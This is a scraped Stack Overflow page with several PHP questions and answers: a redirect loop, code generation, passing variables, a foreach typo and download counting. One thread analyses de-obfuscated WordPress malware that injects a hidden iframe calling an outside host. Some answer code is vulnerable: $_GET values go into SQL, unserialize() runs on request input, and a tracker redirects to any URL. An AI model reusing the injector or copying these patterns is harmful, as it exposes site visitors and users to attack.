Closed. This question is not reproducible or was caused by typos. It is not currently accepting answers.
This question was caused by a typo or a problem that can no longer be reproduced. While similar questions may be on-topic here, this one was resolved in a way less likely to help future readers.
Closed 7 years ago.
Improve this question
So I'm using $_GET to capture the URL to use it later but when I use $_GET it wont redirect!
So here's my sample code:
URL : http://localhost/project/active.php/?s=ieugfshd&h=qwuyrbcq&i=1
php code:
<?php
include 'init.php';
$s = trim($_GET['s']);
$h = trim($_GET['h']);
$i = trim($_GET['i']);
$q = key_check($s,$h,$i);
if($q == 1)
{
header("location:password_active.php");
exit;
}
if($q == 0)
{
header("location:login_failed.php");
exit;
}
?>
EDIT:
key_check( ) function
function key_check($k1,$k2,$id)
{
$query = mysql_query("select key1 from users where user_id = '$id'");
$key1 =mysql_result($query,0);
$query = mysql_query("select key2 from users where user_id = '$id'");
$key2 =mysql_result($query,0);
$y=strcmp($k1,$key1);
$z=strcmp($k2,$key2);
if($y || $z == 0)
{
return 1;
}
else
{
return 0;
}
}
Now when I try this, I got "1" but I'm getting
This web page has a redirect loop
But my password_active.php doesn't have any redirects. It's just an html page.
The URL you're using to access to your script is:
http://localhost/project/active.php/?s=ieugfshd&h=qwuyrbcq&i=1
This loads active.php, which does its role and then tries to send the following header :
header("location:password_active.php");
The browser recieves this header, and tries to resolve that relative URL by adding password_active.php after the last slash before the query string (that ?s=xxx string).
So your browser loads:
http://localhost/project/active.php/password_active.php?s=ieugfshd&h=qwuyrbcq&i=1
This loads active.php again, which does its role again and then send again the same header, and that loads this page:
http://localhost/project/active.php/password_active.php?s=ieugfshd&h=qwuyrbcq&i=1
Again. And again. And again. After several tries, your browser understands that something is going wrong and stops.
You should use an absolute URL in your HTTP header:
header("Location: /project/password_active.php");
Also, please note how HTTP headers should be written, according to the standard.
Random notes :
According to the file names, $s and $h are both passwords. You should hash them, and not passing them via the URL.
if($y || $z == 0) is unlikely to work as you think, since it will be evaluated as if y or not z in pseudo code, while you may have wanted if not y and not z for password checking.
Also, good point for calling exit() after a Location header. You should never forget that, as it is very important and may cause some trouble in your scripts if you forget them.
Try removing / after file.php. Like index.php?i=sa
Related
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 3 years ago.
Improve this question
Hello everyone again here,
I want to create a PHP script for my software which generates and returns the specific code using one $_GET request with a string and using another verificates this code, then forbid running same string.
Something what should work like this:
1st user's software runs "http://example.com/codes.php?create=" and string like "abc".
and script returns code based on "abc", e.g. "4aO45k", "12sdF4" etc.
2nd user's software runs "http://example.com/codes.php?verify=" and this code.
If this code exists, return true and remove it FOREVER, meaning this code will never be generated again. If this code doesn't exist, return false.
If 1st user's software will run "http://example.com/codes.php?create=abc" another code will be generated.
In simple words:
if $_GET is create, then
generate random alphanumeric string, save it and return
if $_GET is verify, then
check if this string exists, if so, then
return true, remove from saved
otherwise
return false
Possible without databases, SQL, mySQL, FireBird...?
How do I make it using .ini files as storage?
Thanks.
It's possible with files. You can do something like the simple solution below:
A couple of notes:
I don't know what you intend by based on exactly, so this just uses the input as a prefix
This stores every code in a file indefinitely; if used a lot this file will grow very large and checking for the existence of codes, and ensuring new codes are unique can grow very slow
The same code can be verified multiple times, but will never be recreated. Marking them as used after verification is of course possible as well
As a general rule don't go creating global functions and shoving everything in one file like this. It's really just proof of concept of what was asked
<?php
$file = fopen('codes', 'a');
if (!empty($_GET['create'])) {
$seed = $_GET['create'];
do {
$code = uniqid($seed);
} while (codeExists($code));
fwrite($file, $code . "\n");
echo $code;
}
else if (!empty($_GET['verify'])) {
echo codeExists($_GET['verify']) ? 'found' : 'not found';
}
function codeExists($verification) {
$file = fopen('codes', 'r');
$found = false;
while ($code = trim(fgets($file))) {
if ($code == $verification) {
$found = true;
break;
}
}
return $found;
}
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 9 years ago.
Improve this question
I'm trying to get a variable which I declared in one php file to another without including the whole first php
while($row = mysql_fetch_assoc($sql)) {
// Urlaubstage ausgeben
if($row['frtutage'] < 1) {
$verbraucht = "0";
} else {
$verbraucht = $row['frtutage'];
}
$resturlaub = $row['miturlaubstage'] + $row['mitutagevorjahr'] - $verbraucht;
$urlaubgesamt = $row['miturlaubstage'] + $row['mitutagevorjahr'];
I need the variable $resturlaub in the second PHP without calculating the variable again.
How do I do this? Or is it even possible?
Thanks.
edit: the first php file is about calculating vacation days and how much I have remaind after taking a few vacation days, in the second file I need the calculation of the remaining days then, so I just want to use the variable again and not calculate it again
You can try somehting like
$var = 'random_query';
$page= 'yourpage.com/?my_var='.serialize($var);
header("Location: $page");
exit;
and in your page you can get the value by
if (isset($_GET['my_var']))
{
$my_var = unserialize($_GET['my_var']);
}
But it would depend on the size of that variable that you need to pass, and what is the purpose of the scripts.
If you don't want to include the whole first php file but only a variable then you should create a third file (called: variables.php or config.php for example).
Then include variables.php in both file so the variable will be shared among your scripts
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 9 years ago.
Improve this question
My Wordpress website recently became infected with malware and has been blacklisted. I thought I fixed it by updating the site and plugins and removing any code I didn't recognize.
I then used Sucuri Site Checker and it seemed okay, so I submitted a review request with Google. However, Google have said that it still contains malware in the form of malicous code (they referred to it as a code injection).
I am a bit lost for what to do. Is there a way to find the bit of code which Google is finding? The domain is sudorf.co.uk but it has malware so I wouldn't advise going there - no idea what the malware will be doing.
Any help would be greatly appreciated.
EDIT: I found that code a few days ago and deleted it, then I updated all versions etc. But obviously it has come back again. Does anyone have an idea how it might be getting there. My thoughts are that its either from a plugin - which is why I am going to remove all of them. The other is the contact form - but I didn't think this would have allowed them to edit the header.php.
This is pure info. Your malware looks like this when it's de-obfuscated:
function k09() {
var static = 'ajax';
var controller = 'index.php';
var k = document.createElement('iframe');
k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.php';
k.style.position = 'absolute';
k.style.color = '512';
k.style.height = '512px';
k.style.width = '512px';
k.style.left = '1000512';
k.style.top = '1000512';
if (!document.getElementById('k')) {
document.write('<p id=\'k\' class=\'k09\' ></p>');
document.getElementById('k').appendChild(k);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
k09();
}
}
http://dostojewskij-gesellschaft.de/VD49Jdzr.php simply outputs "OK".
Why?
My guess is that this is an IP/traffic logger. Maybe for the hackers to check which blogs are most active and then later come back and hack that particular site (no need to waste time on a site with 2 visitors a month). This is good and bad.
The good part is that it seems that they haven't used any of your user database or anything else.
The bad part is that they might very well have downloaded your entire database since they've obviously had executing rights on your server, and might've placed their PHP files all over your server. Your best bet is to start on a fresh WP and copy plugins/themes in one-by-one while manually checking them.
Change all passwords. Even your DB login. Consider everything compromised.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
Questions asking for code must demonstrate a minimal understanding of the problem being solved. Include attempted solutions, why they didn't work, and the expected results. See also: Stack Overflow question checklist
Closed 9 years ago.
Improve this question
$inputarray=array("username", "password");
foreach($inputarray as $inputkey);
if(isset($_POST[$inputkey]) && !empty($_POST[$inputkey]))
{
$inputname=$inputkey;
$inputresult=$_POST[$inputkey];
$$inputname=$inputresult;
}
else
{
die("You have to fill both fields.");
}
$username isn't being defined, only $password. Anyone know what's wrong?
It's just a typo:
foreach($inputarray as $inputkey);
You included a semicolon at the end of that line, so the foreach statement runs, then ends, and then the if clause executes on the last value that the foreach statement left in $inputkey.
Try:
foreach($inputarray as $inputkey)
{
if(isset($_POST[$inputkey]) && !empty($_POST[$inputkey]))
{
$inputname=$inputkey;
$inputresult=$_POST[$inputkey];
$$inputname=$inputresult;
}
else
{
die("You have to fill both fields.");
}
}
Error is probably due to the ; at the end the foreach line. This will cause the foreach line to run leaving to completion, but not run any other statements as there is no enclosure that follows it. Once completed the value of $inputkey will be "password" which is why you are only getting data from "password"
Try:
$inputarray=array("username", "password");
foreach($inputarray as $inputkey) {
if(isset($_POST[$inputkey]) && !empty($_POST[$inputkey])) {
$inputname=$inputkey;
$inputresult=$_POST[$inputkey];
$$inputname=$inputresult;
} else {
die("You have to fill both fields.");
}
} //endforeach
Variable variables are a code smell that you're making things hard on yourself. Instead of doing that, at this stage, and for the specific purposes of a login page, I would make life as simple, readable, and uncomplicated as you can.
Just do this:
$username = #$_POST['username']; // Just about the only place where using # is ok.
$password = #$_POST['password'];
if(!trim($username) || !trim($password)){
die("You have to fill both fields.");
}
A login form is not a place to innovate or make your code complicated. For a little added abstraction, you could put that information into a simple login validation function so that you can modify the criteria down the line (e.g. username must be longer than 1 character, or whatever).
But from looking at your code, you're making a CLASSIC MISTAKE:
DO NOT ROLL YOUR OWN LOGIN SYSTEM THE FIRST TIME AROUND.
Reuse an expert's login code and learn from that. Write other things in custom php, but borrow someone else's time tested login code for database parameterization, error checking, and abstraction. Writing your own login system is playing with fire.
It looks like you're assigning the string name $inputkey to the value. Also you were creating dynamic variables that you might never have found in your code.
$inputarray=array("username", "password");
foreach($inputarray as $inputkey=>$inputvalue);
if(isset($_POST[$inputkey]) && !empty($_POST[$inputkey]))
{
$inputname=$inputkey;
$inputresult=$_POST[$inputkey];
$inputname=$inputresult;
}
else
{
die("You have to fill both fields.");
}
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
Questions asking for code must demonstrate a minimal understanding of the problem being solved. Include attempted solutions, why they didn't work, and the expected results. See also: Stack Overflow question checklist
Closed 9 years ago.
Improve this question
While($enreg=mysql_fetch_array($res))
{
$link_d.="<font color=\"red\">clic here to download</font></td>"
}
i want to use the href so it leads to download link, also to send the id to a php file so i can get how many times the files have been downloaded !
How can we use href to multiple links !
You can't. A link can only point to one resource.
Instead, what you should do is have your PHP script redirect to the file. The link points at your PHP script with the counter, and then set a Location: header (which automatically sets a 302 status code for redirection) with the value being the URL you want to redirect to.
Also, you should really use htmlspecialchars() around any variable data you use in an HTML context, to ensure you are generating valid HTML.
Ideally you would have some checks to see if it's a human downloading (Web crawlers may trigger it - we will put no-follow in the link which will help though). You could also use a database but that gets more complicated. My preferred way would be to use Google Analytics Events. But here is a simple PHP script that might fulfill your needs without the complexity of the other solutions.
First modify your links to have a tracker script and to urlencode
$link_d.= '<a style="color:red" href="tracker.php?url='.urlencode($enreg[link]).'" target="_blank">click here to download</a>';
}
Then create a script that will record downloads (tracker.php)
<?php
// keep stats in a file - you can change the path to have it be below server root
// or just use a secret name - must be writeable by server
$statsfile = 'stats.txt';
// only do something if there is a url
if(isset($_GET['url'])) {
//decode it
$url = urldecode($_GET['url']);
// Do whatever check you want here to see if it's a valud link - you can add a regex for a URL for example
if(strpos($url, 'http') != -1) {
// load current data into an array
$lines = file($statsfile);
// parse array into something useable by php
$stats = array();
foreach($lines as $line) {
$bits = explode('|', $line);
$stats[(string)$bits[0]] = (int)$bits[1];
}
// see if there is an entry already
if(!isset($stats[$url])) {
// no so let's add it with a count of 1
$stats[$url] = 1;
} else {
// yes let's increment
$stats[$url]++;
}
// get a blank string to write to file
$data = null;
// get our array into some human readabke format
foreach($stats as $url => $count) {
$data .= $url.'|'.$count."\n";
}
// and write to file
file_put_contents($statsfile, $data);
}
// now redirect to file
header('Location: ' . $url);
}
You can't.
Anchor are meant to lead to one ressource.
What you want to do is tipically addressed by using an intermediate script that count the hit and redirect to the ressource.
eg.
Click here to download
redirect.php
// Increment for example, a database :
// UPDATE downloads SET hits = (hits + 1) WHERE id=42
// Get the URI
// SELECT uri FROM downloads WHERE id=42
// Redirect to the URI
// (You may also need to set Content-type header for file downloads)
header( "Location: $uri" );
You may optimize this by passing the uri as a second parameter so that you won't need to fetch it at redirect time.
Click here to download
Another way of collecting this kind of statistics is to use some javascript tools provided by your statistics provider, like Google Analytics or Piwik, adding a listener to the click event.
It is less invasive for your base code but won't let you easily reuse collected data in your site (for example if you want to show a "top download" list).
Create a file with download script for example download.php and route all your downloads through it. Update your counter in this page and use appropriate headers for download.
eg:
url may be download.php?id=1&file=yourfile
in download.php
//get id and file
//database operation to update your count
//headers for download